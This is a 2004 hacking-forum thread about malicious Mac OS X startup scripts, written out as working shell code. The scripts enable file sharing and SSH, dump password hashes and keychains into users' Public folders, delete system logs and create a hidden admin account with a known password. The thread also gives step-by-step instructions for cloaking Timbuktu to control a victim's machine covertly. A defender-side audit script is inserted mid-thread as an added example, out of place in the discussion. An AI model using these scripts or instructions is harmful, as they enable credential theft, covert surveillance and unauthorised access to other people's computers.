Macintosh Underground :: View topic - Startup scripts
DimBulb | Senior Member | Joined: 03 Mar 2004 | Posts: 322
Posted: March 13, 2004, 6:57 pm Post subject: Startup scripts
EDIT 06 April, 2004 - This startup script is evolving, follow this thread to the end for the latest version of the script!
This is an OS X startup item with a shell script to replace the current hostconfig file with a different copy (which has sharing turned on among other things.) It also copies a few files and the netinfo directory into the Public folder of every user folder. On the first reboot SMB sharing will be turned on and the information copied to the .info folder will contain the Mac password hashes and the SMB hashes which are easier to crack.
There are three textblocks below. Save each as a separate text file using the names specified for each textblock. Create a new folder called opener. Copy the three text files into that folder. Now place the folder in the /Library/StartupItems folder. Reboot.
If you don't want the appletalk hostname to change you could paste it into the new hostconfig file.
This works on 10.2.8 and prior, haven't tried it on 10.3.
Anyone have any other nifty scripts?
SAVE THIS AS A TEXT FILE CALLED opener
#! /bin/sh
chmod 777 /etc/hostconfig
chflags nouchg /etc/hostconfig
mv /etc/hostconfig /etc/hostconfigold.old
cp /Library/StartupItems/opener/hostconfig /etc/hostconfig
cp -R /Library/ApplePasswordServer /.info/Library/ApplePasswordServer
cp /Library/WebServer/users /.info/Library/WebServer/users
cp /System/Library/CoreServices/SystemVersion.plist /.infoSystem/Library/CoreServices/SystemVersion.plist
cp -R /private/var/db /.info/private/var/db
cd /.info
nidump passwd . > .nidump.txt
nidump passwd / > .nidump2.txt
chmod -R 777 /.info
cd /Users
find . -maxdepth 2 -name "Public" -type d -exec sudo cp -R /.info '{}/.info' \;
rm -Rf /private/var/log/
rm -Rf /Library/Logs/
SAVE THIS AS A TEXT FILE CALLED StartupParameters.plist
Description
opener
Hide
Messages
start
started
stop
stopped
OrderPreference
None
Provides
opener
Requires
Resolver
SAVE THIS AS A TEXT FILE CALLED hostconfig
##
# /etc/hostconfig
##
# This file is maintained by the system control panels
##
# Network configuration
HOSTNAME=-AUTOMATIC-
ROUTER=-AUTOMATIC-
# Services
AFPSERVER=-YES-
APPLETALK=-YES-
AUTHSERVER=-NO-
AUTOMOUNT=-YES-
CONFIGSERVER=-NO-
IPFORWARDING=-NO-
MAILSERVER=-NO-
NETBOOTSERVER=-NO-
NETINFOSERVER=-AUTOMATIC-
NISDOMAIN=-NO-
RPCSERVER=-AUTOMATIC-
TIMESYNC=-YES-
QTSSERVER=-NO-
SSHSERVER=-YES-
WEBSERVER=-YES-
CUPS=-YES-
DNSSERVER=-NO-
IPV6=-YES-
SMBSERVER=-YES-
APPLETALK_HOSTNAME=*41*
Last edited by DimBulb on April 6, 2004, 10:06 pm; edited 1 time in total
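From the defender's side, each step of the script above leaves a mark on disk: an extra StartupItem, services flipped to -YES- in hostconfig, a /.info staging folder, hidden folders in users' Public directories, and missing log directories. The audit below is an added example, not part of the original post; the allowlist argument, the function names and the constructed sample tree (with the hypothetical names `PrinterHelper`, `alice` and `bob`) are assumptions made for illustration.

```sh
#!/bin/sh
# Added example: audit an OS X 10.2/10.3-era volume for the StartupItem's artifacts.
# Usage: sh audit.sh <root> "<allowed StartupItem names>"

# Services the replacement hostconfig in the post switches on.
WATCHED_SERVICES="AFPSERVER SMBSERVER SSHSERVER WEBSERVER"

# Print each watched service set to -YES- in <root>/etc/hostconfig.
enabled_services() {
    for svc in $WATCHED_SERVICES; do
        grep -q "^${svc}=-YES-" "$1/etc/hostconfig" 2>/dev/null && echo "$svc"
    done
    return 0
}

# Print StartupItems not in the space-separated allowlist $2 (admin-supplied assumption).
unexpected_startup_items() {
    for dir in "$1"/Library/StartupItems/*; do
        [ -d "$dir" ] || continue
        name=$(basename "$dir")
        case " $2 " in
            *" $name "*) ;;
            *) echo "$name" ;;
        esac
    done
    return 0
}

# Print hidden directories sitting directly inside any user's Public folder.
hidden_public_dirs() {
    for dir in "$1"/Users/*/Public/.[!.]*; do
        [ -d "$dir" ] && echo "$dir"
    done
    return 0
}

# Print other leftovers the script creates: the staging folder, the renamed
# hostconfig, and the log directories it deletes.
staging_artifacts() {
    [ -d "$1/.info" ] && echo "staging dir: /.info"
    [ -e "$1/etc/hostconfigold.old" ] && echo "renamed config: /etc/hostconfigold.old"
    [ -d "$1/private/var/log" ] || echo "missing: /private/var/log"
    [ -d "$1/Library/Logs" ] || echo "missing: /Library/Logs"
    return 0
}

# Run every check and print one finding per line.
audit() {
    enabled_services "$1" | sed 's/^/service enabled: /'
    unexpected_startup_items "$1" "$2" | sed 's/^/unexpected StartupItem: /'
    hidden_public_dirs "$1" | sed 's/^/hidden dir in Public: /'
    staging_artifacts "$1"
}

# Constructed sample tree (not taken from the thread) for an offline run.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/etc" "$t/.info" "$t/Library/StartupItems/opener" \
        "$t/Library/StartupItems/PrinterHelper" "$t/Users/alice/Public/.info" "$t/Users/bob/Public"
    printf 'AFPSERVER=-NO-\nSMBSERVER=-YES-\nSSHSERVER=-YES-\n' > "$t/etc/hostconfig"
    echo "$t"
}

if [ "$#" -ge 1 ]; then audit "$1" "${2:-}"; fi
```

Run it against a mounted disk image or backup rather than the booted system, since a StartupItem runs as root and can alter what a live check sees.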
DimBulb | Senior Member | Joined: 03 Mar 2004 | Posts: 322
Posted: March 21, 2004, 12:22 pm Post subject: Add this to the reconfig script
#!/bin/sh
niutil -create / /users/hacker
niutil -createprop / /users/hacker uid 401
niutil -createprop / /users/hacker realname "Hacker"
niutil -createprop / /users/hacker home "/private/var/home"
niutil -createprop / /users/hacker shell "/bin/bash"
niutil -createprop / /users/hacker gid 20
niutil -createprop / /users/hacker sharedDir /
niutil -createprop / /users/hacker passwd "rQ3p5/hpOpvGE" #(it's 1234)
nicl . -append /groups/admin users hacker
cp -R /System/Library/User\ Template/English.lproj /private/var/hacker
chown -R hacker:staff /private/var/home
Edit: The user will not appear in the SystemPreferences Accounts pane nor in the login window but will appear in the Netinfo Manager app.
_________________
No hablo español - Je ne parle pas français - Ich spreche nicht Deutsches - Non parlo italiano - Eu não falo Portugues
http://www.babelfish.altavista.com http://www.freetranslation.com/
Last edited by DimBulb on March 29, 2004, 8:48 pm; edited 4 times in total
hard-mac | Full Member | Joined: 10 Dec 2003 | Posts: 103 | Location: ether.monkey.land
Posted: March 24, 2004, 7:46 pm Post subject:
So I have been testing out the startup opener scripts. I am trying to make them work on 10.3. I added the niutil commands at the start of the opener script to create a new user. Copied over the entire opener directory with the 3 files and restarted. The change over of the hostconfig seems to work fine and the creation of the new user. But the copying of password hashes etc. doesn't seem to work. Do we not need to create a .info directory first?
hm
DimBulb | Senior Member | Joined: 03 Mar 2004 | Posts: 322
Posted: March 24, 2004, 8:02 pm Post subject: Try sudo
Try prefacing those commands with sudo ... Mac OS restricts things even for root!
hard-mac | Full Member | Joined: 10 Dec 2003 | Posts: 103 | Location: ether.monkey.land
Posted: March 24, 2004, 8:45 pm Post subject:
No sudo wasn't needed just some directory tweaking and to create the directory. The following worked for me:
Code:
chmod 777 /etc/hostconfig
chflags nouchg /etc/hostconfig
mv /etc/hostconfig /etc/hostconfigold.old
cp /Library/StartupItems/opener/hostconfig /etc/hostconfig
mkdir /.info
cp -R /Library/ApplePasswordServer /.info/ApplePasswordServer
cp /Library/WebServer/users /.info/users
cp /System/Library/CoreServices/SystemVersion.plist /.info/SystemVersion.plist
cp -R /private/var/db /.info/db
cd /.info
nidump passwd . > .nidump.txt
nidump passwd / > .nidump2.txt
chmod -R 777 /.info
cd /Users
find . -maxdepth 2 -name "Public" -type d -exec sudo cp -R /.info '{}/.info' \;
As far as I can tell there is no ApplePasswordServer under 10.3 but I am not totally sure.
What exactly does the last line do?
DimBulb | Senior Member | Joined: 03 Mar 2004 | Posts: 322
Posted: March 25, 2004, 8:36 am Post subject: Last line
find . -maxdepth 2 -name "Public" -type d -exec sudo cp -R /.info '{}/.info' \;
CD /Users
find . -maxdepth 2 -name "Public" -type d
This will find folders named "Public" in each user folder (only 2 folders deep from the /Users folder so any other folder named Public inside Desktop for instance would be ignored.)
-exec sudo cp -R /.info '{}/.info' \;
Then run the sudo cp command to copy the whole folder /.info (where we gathered all the netinfo and hashes) into the Public folders for each user.
Now even if the users change passwords, each time the script runs (at every startup) the hashes and netinfo data are copied into an invisible folder called ".info" in their PUBLIC folders. Connect as guest, mount the public share, open terminal and cd /volumes/theirusername and then ls -alo to see the hidden folder (and copy it to your own desktop with cp -R .info ~/info
The ApplePasswordServer file was only from OS X server, I'm not even sure what's in the file I just thought I'd have the script grab it... to see if I wanted to change any prefs in it etc but the samba hashes are so easy to crack... WHO CARES! WooHOO!
Other interesting files:
system/library/startupitems/appleshare/appleshare - it's the script that launches apple file sharing
system/library/startupitems/systemlog/systemlog - the script that runs the system logger
system/library/startupitems/ssh/ssh
system/library/startupitems/authserver/authserver
By the way, you can edit the TimbuktuResources file inside the Timbuktu package. Locate the icons for observe, control and exchange, blank them out (using resorcere or resedit.) Blank out the masks too (erase the pixels until the icon is pure white.) Change the Timbuktu startup plist so there are no "Starting Timbuktu Services" strings (just delete the text.) Remove all the documentation etc. Now you can drag tb2 app folder, prefs and the startup script to their drive - and it works - and there is no icon on the menu bar!
Do you want more info about this?
hard-mac | Full Member | Joined: 10 Dec 2003 | Posts: 103 | Location: ether.monkey.land
Posted: March 25, 2004, 11:00 am Post subject:
Thanks for the info on the last line, that's what I thought it did. That is the part that doesn't seem to be working yet. I can run it in the terminal and it works yet when it runs at startup it doesn't work. Any ideas?
I can definitely think of some other things to copy over while we're at it and snooping around for tidbits of info:
/Library/Keychains/System.keychain
/Library/Keychains/FileVaultMaster.cer
/Library/Keychains/FileVaultMaster.keychain
I'd like to hear some more about cloaking Timbuktu, do you think it is better to use than VNC or ARD?
ktheman | Elder Member | Joined: 13 Nov 2003 | Posts: 990 | Location: lost in the internet
Posted: March 25, 2004, 6:12 pm Post subject:
what does this do?
DimBulb | Senior Member | Joined: 03 Mar 2004 | Posts: 322
Posted: March 25, 2004, 6:30 pm Post subject: StartupScripts
Hard-Mac > Maybe it's the sudo before the cp command, try just -exec cp instead of -exec sudo cp ???
Also, how about:
mkdir /.info/keychains
cd /users
find . -maxdepth 3 -mindepth 3 -name "Keychains" -type d -exec cp -R '{}' /.info/keychains \;
(do this before copying /.info into the public folders...)
Ktheman > They are startup scripts for OS X that execute commands when the system boots up. In this case the commands are geared toward opening up ports / turning on services and gathering password hashes (and then putting all the relevant information in the Public directories of each user...)
ktheman | Elder Member | Joined: 13 Nov 2003 | Posts: 990 | Location: lost in the internet
Posted: March 25, 2004, 6:37 pm Post subject:
hmmm.... i see.
can't you set it up to use sendmail to send an e-mail to you?
DimBulb | Senior Member | Joined: 03 Mar 2004 | Posts: 322
Posted: March 25, 2004, 7:10 pm Post subject: Cloaking Timbuktu 6.0.3 for OS X
Timbuktu is more polished than VNC (which also cloaks very well) and has more features than ARD - like the locator service for instance.
Cloaking Timbuktu 6.0.3 for OS X
First install Timbuktu and make a backup of the Timbuktu application folder (because you won't want the cloaked one running on your machine - you can put the real thing back on your machine after we're done.)
Move the installed, running copy of TB2 that we are going to change into:
/Library/Preferences/Netopia/Timbuktu Folder (Yes, we are putting the entire Timbuktu application folder inside its own preferences folder!)
Now launch that copy of the timbuktu app and go through the setup menu to set prefs:
General - disable all the check-boxes. (No checks!)
Features - disable Address book, Dial Direct Transport, TCP/IP Browser, TCP/IP Scanner, Control/Look Client, send and receive messages, Exchange files client, chat service, intercom service, knock service, invite service. (Only these three features are left enabled: TCP/IP Transport, Control/Look Host, and Exchange Files Host) - Disabling these also makes the Timbuktu menubar menu very short...
Master Password - pick a master password that will be required in order to change the preferences or turn off the incoming access (hee hee.) Check all the boxes (that it lets you check.)
Allow common passwords - Expire should be unchecked.
Sound - choose "none" for all events.
Messages received - uncheck the two boxes
IP locator - put in any bogus email address such as 0001@hacked.net
Now quit the app. Make a copy of the pref file (Netopia Preferences) and go back into the app, go to IP locator again, click advanced enter 0.0.0.0 and then quit, copy the pref again, go back into the app and take out the locator service and the 0.0.0.0 and quit again, copy that pref file
You now have 3 pref files:
no locator name and no 0.0.0.0 - this is safest, the user will never see an error message saying "Timbuktu can not connect to the locator service"
with locator name only - for machines using a public IP - their IP is the public ip thus no need to override
with locator name and 0.0.0.0 - for people who use a router and private IP, the 0.0.0.0 tells tb2 to report the public address of the router instead of the computer's ip address. (You have to do the port mapping or DMZ in the router if they did not already have it setup though.)
"Show Package Contents" on the Timbuktu App, open the folder SharedSupport, edit the StartupParameters.plist file, blank-out the messages "Starting Timbuktu host" and "Stopping Timbuktu host". Save the changes. (This is the file that gets copied into the TimbuktuStartup script in /Library/StartupItems - actually, you should go make this change on that file too !!!)
While you are in the package, trash the help files to make the folder smaller for uploading:
Timbuktu\ Pro.app/Contents/Resources/English.lproj/Timbuktu\ Pro\ Help
And trash:
Timbuktu\ Pro.app/Contents/SharedSupport/License\ Agreement (file)
Timbuktu\ Pro.app/Contents/SharedSupport/Modem\ Descriptions (folder)
Now to blank out the icons using ResEdit or Resorcerer 2.4 (runs in Classic, the OS X version does not have the icon editor working yet.)
Edit the Timbuktu Resources file inside the Timbuktu.app package in SharedSupport...
icm# - blank out the icons and masks for control, observe and exchange
icm8 - same thing
ics# - same thing + "connection menu icons" (these may be the only ones that matter but I wiped out every icon that looked even remotely like the control, observe and exchange icons and it worked nicely.)
ics8 - same as ics#
Save the changes.
Now just upload the /Library/Preferences/Netopia folder into their /Library/Preferences and also upload the /Library/StartupItems/TimbuktuStartup folder into their /Library/StartupItems
The whole thing is about 5MB.
Then reboot their machine and connect, no icons on the menu bar to tip them off, just don't go moving the mouse while they are sitting there watching!
Be sure to keep a copy of the hacked version for future use - you can edit the Netopia Preferences file to easily change the locator name... (in Hexedit search for "@hacked.net" or whatever you used.)
Don't forget the 3 different versions of the Netopia Preferences file for different situations...
hard-mac | Full Member | Joined: 10 Dec 2003 | Posts: 103 | Location: ether.monkey.land
Posted: March 25, 2004, 9:12 pm Post subject:
Code:
find . -maxdepth 2 -name "Public" -type d -exec cp -R /.info '{}/.info' \;
So I have tried all kinds of different configurations of this line and none of them have worked. sudo, no sudo, sudo in front of find...argh^&*! is there any other way to do this that you can think of?
my system log says:
Code:
Mar 25 20:54:01 localhost SystemStarter: opener (284) did not complete successfully.
The other find command for keychains also doesn't seem to work either. It doesn't look like it likes the command much at least as a startup script.
DimBulb | Senior Member | Joined: 03 Mar 2004 | Posts: 322
Posted: March 26, 2004, 8:08 am Post subject: /
Hmmmm, I'm still in 10.2.8 using tcsh - and it works...
I just tried it in bash on 10.2.8 via terminal (not during startup) and that worked also. (change to !#/bin/bash to run in bash at startup.)
Perhaps for simplicity's sake you could take out the . in front of info so that the folders it creates would be visible rather than hidden in the ~/Public folder.
If you remove that one line do you still get the startup error in the log?
Try this in the startup script and look at the whatsup.txt file, is find working ok?
cd /Users
find . -maxdepth 2 -name "Public" -type d > /whatsup.txt
Another idea would be to edit the StartupParameters.plist and change OrderPreference to Late or Last so that all the other services are running prior to the script... also change Uses to Disks
hard-mac | Full Member | Joined: 10 Dec 2003 | Posts: 103 | Location: ether.monkey.land
Posted: March 26, 2004, 6:43 pm Post subject:
uuhhh duh, yeah it was because of bash in panther. Works great now with no sudo at all. I'm just adding some more files to grab and testing it out.
The TB2 stuff looks great. I should have some time to test it all out this weekend. What vnc client do you prefer on OS X?
DimBulb | Senior Member | Joined: 03 Mar 2004 | Posts: 322
Posted: March 26, 2004, 6:56 pm Post subject: VNC thing
I use VNC thing but I'm in 10.2.8 still - not sure if it works too well with 10.3.x. The client has a minor irritating glitch showing the cursor - other than that I've had good results. It's a very small upload compared to Timbuktu which is also a plus. On the downside, no locator service.